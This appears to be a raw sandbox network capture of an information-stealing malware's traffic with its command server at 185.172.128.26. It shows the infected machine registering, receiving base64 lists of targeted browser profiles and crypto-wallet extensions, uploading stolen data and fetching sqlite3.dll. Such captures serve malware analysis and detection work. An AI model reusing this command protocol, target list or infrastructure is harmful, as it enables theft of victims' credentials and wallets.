Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:21.115016937 CET	416	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAF Host: 185.172.128.26 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 38 38 30 30 32 35 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="hwid"18E8800250C53528003197------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="build"default7------EGIDHDGCBFBKECBFHCAF--
Mar 28, 2024 09:15:22.490556955 CET	343	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 148 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4f 44 67 79 5a 44 56 6b 4d 44 55 34 59 7a 59 35 4f 57 5a 6c 5a 57 46 6d 4d 6d 45 78 4d 47 45 30 4e 47 51 77 4d 7a 63 33 4e 47 45 32 4d 7a 68 6c 5a 6a 4a 69 4d 57 59 33 4d 7a 4e 68 4e 6a 64 6c 5a 6a 4e 6a 4e 32 45 33 59 32 4d 78 4d 44 55 32 4e 7a 45 30 4f 44 42 6d 4f 47 49 7a 5a 44 4d 30 66 47 56 6e 64 32 56 6e 5a 33 64 38 5a 48 4e 6e 5a 32 56 6e 5a 57 63 75 5a 6d 6c 73 5a 58 77 78 66 44 42 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 Data Ascii: ODgyZDVkMDU4YzY5OWZlZWFmMmExMGE0NGQwMzc3NGE2MzhlZjJiMWY3MzNhNjdlZjNjN2E3Y2MxMDU2NzE0ODBmOGIzZDM0fGVnd2VnZ3d8ZHNnZ2VnZWcuZmlsZXwxfDB8MXwxfDF8MXwxfDF8
Mar 28, 2024 09:15:22.621973038 CET	469	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA Host: 185.172.128.26 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 2d 2d 0d 0a Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="message"browsers------IEHDBAAFIDGDAAAAAAAA--
Mar 28, 2024 09:15:22.915148020 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2
Mar 28, 2024 09:15:22.915168047 CET	430	IN	Data Raw: 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c Data Ascii: hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZ
Mar 28, 2024 09:15:23.082309961 CET	468	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFBFCAFCBKFIEBFHIDB Host: 185.172.128.26 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 2d 2d 0d 0a Data Ascii: ------KKFBFCAFCBKFIEBFHIDBContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------KKFBFCAFCBKFIEBFHIDBContent-Disposition: form-data; name="message"plugins------KKFBFCAFCBKFIEBFHIDB--
Mar 28, 2024 09:15:23.373204947 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIF
Mar 28, 2024 09:15:23.373250008 CET	1286	IN	Data Raw: 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e Data Ascii: dhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZ
Mar 28, 2024 09:15:23.373261929 CET	1286	IN	Data Raw: 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 Data Ascii: cmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramV
Mar 28, 2024 09:15:23.373330116 CET	1286	IN	Data Raw: 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 Data Ascii: xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ
Mar 28, 2024 09:15:23.373347998 CET	468	IN	Data Raw: 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d Data Ascii: bXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGN
Mar 28, 2024 09:15:24.025243998 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA Host: 185.172.128.26 Content-Length: 7631 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:24.025358915 CET	7631	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Mar 28, 2024 09:15:25.519515038 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:27.170564890 CET	93	OUT	GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:27.462313890 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:27 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 